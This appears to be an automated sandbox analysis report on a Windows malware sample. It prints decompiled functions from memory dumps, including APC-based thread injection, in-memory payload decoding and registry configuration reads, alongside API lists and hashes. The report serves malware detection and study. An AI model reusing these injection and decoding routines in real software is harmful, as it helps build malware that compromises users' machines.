                                                          0x005e131a
                                                          0x005e1321
                                                          0x005e1323
                                                          0x005e1328
                                                          0x005e132e
                                                          0x005e1334
                                                          0x005e133e
                                                          0x005e1342
                                                          0x005e1344
                                                          0x005e1349
                                                          0x005e134a
                                                          0x005e134b
                                                          0x005e1350
                                                          0x005e1356
                                                          0x005e135f
                                                          0x005e1360
                                                          0x005e1365
                                                          0x005e136b
                                                          0x005e1377
                                                          0x005e1379
                                                          0x005e1379
                                                          0x005e1383
                                                          0x005e1383
                                                          0x005e1307
                                                          0x005e1309
                                                          0x005e1309
                                                          0x005e138d

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,005E4EF2,?), ref: 005E12F8
                                                          • GetTickCount.KERNEL32 ref: 005E130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,005E4EF2,?), ref: 005E1328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,005E4EF2,?), ref: 005E132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 005E134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,005E4EF2,?), ref: 005E1365
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: d8fd2a8572f0e610303174e7285a892cb597097761c5fc465a139c4ba4abd27f
                                                          • Instruction ID: 2e5cc122d353c02aabc26e9745cf8a77f30ae4bede3cedce91d32c28cc19227b
                                                          • Opcode Fuzzy Hash: d8fd2a8572f0e610303174e7285a892cb597097761c5fc465a139c4ba4abd27f
                                                          • Instruction Fuzzy Hash: 7F114C71A00341EFE31C6B76DC4EB1E7FA8BB98350F000515F9C5CE2D1EA70D8009664
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1000155C, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E1000155C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                          0x10001573
                                                          0x10001579
                                                          0x1000157d
                                                          0x10001588
                                                          0x10001590
                                                          0x10001599
                                                          0x1000159d
                                                          0x100015a4
                                                          0x100015ab
                                                          0x100015ad
                                                          0x100015b3
                                                          0x10001590
                                                          0x100015b7

                                                          APIs
                                                          • CreateThread.KERNEL32 ref: 10001573
                                                          • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001588
                                                          • GetLastError.KERNEL32(00000000), ref: 10001593
                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 1000159D
                                                          • CloseHandle.KERNEL32(00000000), ref: 100015A4
                                                          • SetLastError.KERNEL32(00000000), ref: 100015AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 3832013932-0
                                                          • Opcode ID: 6f0211ee254cd8ac356c66c047a1bb7dd8caa7d1716406ebd0edc35e6fc89079
                                                          • Instruction ID: be479b49fbd3a67d9e649fe4ff68f805dcd113b126df67a65f96eea9d80bca7e
                                                          • Opcode Fuzzy Hash: 6f0211ee254cd8ac356c66c047a1bb7dd8caa7d1716406ebd0edc35e6fc89079
                                                          • Instruction Fuzzy Hash: 6CF0FE72506631FBF3235BA19C98F9BBB6DFB487D1F018404FA0695168C72189119BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E62DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E005E62DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E005EA71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E005EA734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E005EA71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x5ed278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x005e62e1
                                                          0x005e62e8
                                                          0x005e62ed
                                                          0x005e62f0
                                                          0x005e62f7
                                                          0x005e62fa
                                                          0x005e62fd
                                                          0x005e6302
                                                          0x005e6307
                                                          0x005e645b
                                                          0x005e645d
                                                          0x005e645f
                                                          0x005e6464
                                                          0x005e6464
                                                          0x005e630d
                                                          0x005e6310
                                                          0x005e6313
                                                          0x005e6315
                                                          0x005e6315
                                                          0x005e6319
                                                          0x00000000
                                                          0x00000000
                                                          0x005e631d
                                                          0x005e6349
                                                          0x005e634e
                                                          0x005e6350
                                                          0x005e6350
                                                          0x005e6353
                                                          0x005e6356
                                                          0x005e6356
                                                          0x005e6358
                                                          0x00000000
                                                          0x005e6323
                                                          0x005e6325
                                                          0x005e6344
                                                          0x005e6344
                                                          0x005e635b
                                                          0x005e635b
                                                          0x005e635c
                                                          0x005e635c
                                                          0x005e635f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e635f
                                                          0x005e6329
                                                          0x005e6370
                                                          0x005e6374
                                                          0x005e644e
                                                          0x005e6450
                                                          0x005e6450
                                                          0x005e6451
                                                          0x005e6454
                                                          0x00000000
                                                          0x005e6454
                                                          0x005e637d
                                                          0x005e638e
                                                          0x005e6392
                                                          0x005e644a
                                                          0x00000000
                                                          0x005e644a
                                                          0x005e6398
                                                          0x005e639b
                                                          0x005e639f
                                                          0x005e63a3
                                                          0x005e63a8
                                                          0x005e6440
                                                          0x005e6440
                                                          0x00000000
                                                          0x005e6446
                                                          0x005e63b3
                                                          0x005e63bc
                                                          0x005e63d0
                                                          0x005e63d7
                                                          0x005e63ec
                                                          0x005e63f2
                                                          0x005e63fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e63fc
                                                          0x005e63fc
                                                          0x005e63fc
                                                          0x005e6403
                                                          0x005e640b
                                                          0x00000000
                                                          0x00000000
                                                          0x005e640d
                                                          0x005e6416
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e6418
                                                          0x005e641a
                                                          0x005e641d
                                                          0x005e641d
                                                          0x005e6420
                                                          0x005e6424
                                                          0x005e6427
                                                          0x005e642d
                                                          0x005e6430
                                                          0x005e6437
                                                          0x00000000
                                                          0x005e63b3
                                                          0x005e632e
                                                          0x005e6336
                                                          0x005e633c
                                                          0x005e633e
                                                          0x005e633e
                                                          0x005e6341
                                                          0x005e6343
                                                          0x00000000
                                                          0x005e6343
                                                          0x005e631d
                                                          0x005e6363
                                                          0x005e6368
                                                          0x005e636a
                                                          0x005e636a
                                                          0x005e636d
                                                          0x005e636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 005E63D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 005E63EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 005E6403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 005E6427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: b5d1fb274c91817779498d21bf39365ea7c15aef49bc4dc567c8118fff54ed66
                                                          • Instruction ID: ee10f7cbae33f17b6bef647791dbc3a7d24a0ea1340c0397ad23b2911256d861
                                                          • Opcode Fuzzy Hash: b5d1fb274c91817779498d21bf39365ea7c15aef49bc4dc567c8118fff54ed66
                                                          • Instruction Fuzzy Hash: 9B51E171A00258EFCF29DF9AC4846ADBFB6FF653D0F14845AE8959B241C770EA41CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001717, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E10001717(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x10004130;
				_t50 = E1000193C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x10004140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x100051a7; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x10004140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}






























                                                          0x1000171e
                                                          0x1000172e
                                                          0x10001733
                                                          0x10001738
                                                          0x1000174d
                                                          0x10001754
                                                          0x10001759
                                                          0x1000176a
                                                          0x1000176d
                                                          0x10001773
                                                          0x10001775
                                                          0x1000177a
                                                          0x10001856
                                                          0x10001780
                                                          0x10001780
                                                          0x10001784
                                                          0x1000181c
                                                          0x1000178a
                                                          0x1000178b
                                                          0x10001790
                                                          0x10001793
                                                          0x10001796
                                                          0x10001796
                                                          0x1000179d
                                                          0x100017a0
                                                          0x100017a8
                                                          0x100017a9
                                                          0x100017aa
                                                          0x100017b1
                                                          0x100017b5
                                                          0x100017bb
                                                          0x100017bf
                                                          0x100017c1
                                                          0x100017c5
                                                          0x100017c8
                                                          0x100017cf
                                                          0x100017d2
                                                          0x100017d5
                                                          0x100017da
                                                          0x100017f0
                                                          0x100017dc
                                                          0x100017e6
                                                          0x100017e8
                                                          0x100017eb
                                                          0x100017eb
                                                          0x100017f7
                                                          0x100017f7
                                                          0x100017f7
                                                          0x100017cf
                                                          0x10001802
                                                          0x10001805
                                                          0x10001808
                                                          0x1000180f
                                                          0x10001815
                                                          0x10001819
                                                          0x10001828
                                                          0x1000183d
                                                          0x1000182a
                                                          0x10001833
                                                          0x10001838
                                                          0x1000184e
                                                          0x1000184e
                                                          0x1000185d
                                                          0x10001863

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 1000176D
                                                          • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 10001833
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 1000184E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Virtual$AllocFreememcpy
                                                          • String ID: Jun 9 2021
                                                          • API String ID: 4010158826-3443083063
                                                          • Opcode ID: d6042d630db185a82e5861430691fbc1b34c09e24367e0ba5c4772c9cdc59302
                                                          • Instruction ID: 8656aceba1012af9c0f70d32315d13d0163f230196990492a5e13c96c74a3fde
                                                          • Opcode Fuzzy Hash: d6042d630db185a82e5861430691fbc1b34c09e24367e0ba5c4772c9cdc59302
                                                          • Instruction Fuzzy Hash: 45415E75D0121A9FEB05CF98C880BDEBBB6FF48390F258129E90477248CB75AA45CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E6545, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E005E6545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E005EA71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x005e6551
                                                          0x005e6555
                                                          0x005e6556
                                                          0x005e6557
                                                          0x005e6559
                                                          0x005e655b
                                                          0x005e655e
                                                          0x005e6563
                                                          0x005e65fa
                                                          0x005e6601
                                                          0x005e6601
                                                          0x005e656c
                                                          0x005e6573
                                                          0x005e6583
                                                          0x005e6583
                                                          0x005e6589
                                                          0x005e658b
                                                          0x005e6590
                                                          0x005e6599
                                                          0x005e659f
                                                          0x005e65a4
                                                          0x005e65af
                                                          0x005e65b3
                                                          0x005e65b5
                                                          0x005e65b6
                                                          0x005e65bf
                                                          0x005e65c3
                                                          0x005e65d4
                                                          0x005e65c5
                                                          0x005e65ca
                                                          0x005e65cf
                                                          0x005e65de
                                                          0x005e65de
                                                          0x005e65b3
                                                          0x005e65e4
                                                          0x005e65ea
                                                          0x005e65ea
                                                          0x005e65f3
                                                          0x005e65f8
                                                          0x005e65f8
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 2666dce98287f63366b699e6095143580b15aa453ad1a5c9f14621289b5a31b9
                                                          • Instruction ID: 4d0b03e019a9cee36da7d2efa7d93b47f428d23259359232e652c092e7ddc24a
                                                          • Opcode Fuzzy Hash: 2666dce98287f63366b699e6095143580b15aa453ad1a5c9f14621289b5a31b9
                                                          • Instruction Fuzzy Hash: 09218375A0025AEFCB15DFA9C88899EBFF4FF58384B1041AAE942D7214EB30DA05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 100015EA, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E100015EA(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E10001456(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                          0x100015f3
                                                          0x100015f8
                                                          0x10001606
                                                          0x1000160b
                                                          0x1000160b
                                                          0x10001611
                                                          0x10001616
                                                          0x1000161a
                                                          0x1000161e
                                                          0x1000161e
                                                          0x10001628
                                                          0x10001631

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 100015ED
                                                          • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 100015F8
                                                          • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 1000160B
                                                          • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 1000161E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Thread$Priority$AffinityCurrentMask
                                                          • String ID:
                                                          • API String ID: 1452675757-0
                                                          • Opcode ID: a5dee3e18e06bf60a8ab408e9f78a11656e4bb42588931547f78162ab20c471f
                                                          • Instruction ID: b2e2ff5a5641eaa5a328bf891337565213f3a8f6a6c1ebe89abd2415300766a4
                                                          • Opcode Fuzzy Hash: a5dee3e18e06bf60a8ab408e9f78a11656e4bb42588931547f78162ab20c471f
                                                          • Instruction Fuzzy Hash: 52E092312076616BF302AB294C84EAF679CDF853F17028326F920D22E4DF658C0189B8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E8D14, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E005E8D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E005EA2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x5ed2a8; // 0x107a5a8
				_t4 = _t24 + 0x5eedc0; // 0x1669368
				_t5 = _t24 + 0x5eed68; // 0x4f0053
				_t45 = E005E5356( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x5ed2a8; // 0x107a5a8
						_t11 = _t32 + 0x5eedb4; // 0x166935c
						_t48 = _t11;
						_t12 = _t32 + 0x5eed68; // 0x4f0053
						_t52 = E005E45C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x5ed2a8; // 0x107a5a8
							_t13 = _t35 + 0x5eedfe; // 0x30314549
							if(E005E8E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x5ed25c - 6;
								if( *0x5ed25c <= 6) {
									_t42 =  *0x5ed2a8; // 0x107a5a8
									_t15 = _t42 + 0x5eec0a; // 0x52384549
									E005E8E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x5ed2a8; // 0x107a5a8
							_t17 = _t38 + 0x5eedf8; // 0x16693a0
							_t18 = _t38 + 0x5eedd0; // 0x680043
							_t45 = E005E5D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x5ed238, 0, _t52);
						}
					}
					HeapFree( *0x5ed238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E005E4F14(_t54);
				}
				return _t45;
			}

















                                                          0x005e8d14
                                                          0x005e8d24
                                                          0x005e8d27
                                                          0x005e8d2e
                                                          0x005e8d30
                                                          0x005e8d30
                                                          0x005e8d33
                                                          0x005e8d38
                                                          0x005e8d3f
                                                          0x005e8d51
                                                          0x005e8d55
                                                          0x005e8d63
                                                          0x005e8d71
                                                          0x005e8d75
                                                          0x005e8e06
                                                          0x005e8e06
                                                          0x005e8d7b
                                                          0x005e8d7b
                                                          0x005e8d80
                                                          0x005e8d80
                                                          0x005e8d87
                                                          0x005e8d93
                                                          0x005e8d95
                                                          0x005e8d97
                                                          0x005e8d99
                                                          0x005e8da0
                                                          0x005e8db2
                                                          0x005e8db4
                                                          0x005e8dbb
                                                          0x005e8dbd
                                                          0x005e8dc4
                                                          0x005e8dcf
                                                          0x005e8dcf
                                                          0x005e8dbb
                                                          0x005e8dd4
                                                          0x005e8dd9
                                                          0x005e8de0
                                                          0x005e8dfe
                                                          0x005e8e00
                                                          0x005e8e00
                                                          0x005e8d97
                                                          0x005e8e12
                                                          0x005e8e12
                                                          0x005e8e14
                                                          0x005e8e19
                                                          0x005e8e1b
                                                          0x005e8e1b
                                                          0x005e8e26

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01669368,00000000,?,74B5F710,00000000,74B5F730), ref: 005E8D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,016693A0,?,00000000,30314549,00000014,004F0053,0166935C), ref: 005E8E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,005E523E), ref: 005E8E12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 8f1cfabedcddc48c9b8e0112939626504b07efdfd60409739956d2504d12ad55
                                                          • Instruction ID: b86d81f51b9f98cefd9896543cac5ccb424fa90befe721d3449103a12bfce3c8
                                                          • Opcode Fuzzy Hash: 8f1cfabedcddc48c9b8e0112939626504b07efdfd60409739956d2504d12ad55
                                                          • Instruction Fuzzy Hash: 15310F759001C9BFDB19EB92CEC9EAA7FBDFB54700F000099B684AB060D7309E08DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005EA376, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E005EA376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x5ed340; // 0x1669a88
				_push(0x800);
				_push(0);
				_push( *0x5ed238);
				if( *0x5ed24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x5ed24c =  *0x5ed24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E005E7306(_t44, _t40);
						_t18 = E005E4A09(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x5ed24c < 5) {
								 *0x5ed24c =  *0x5ed24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E005E6761();
						RtlFreeHeap( *0x5ed238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E005E1F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E005E4AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
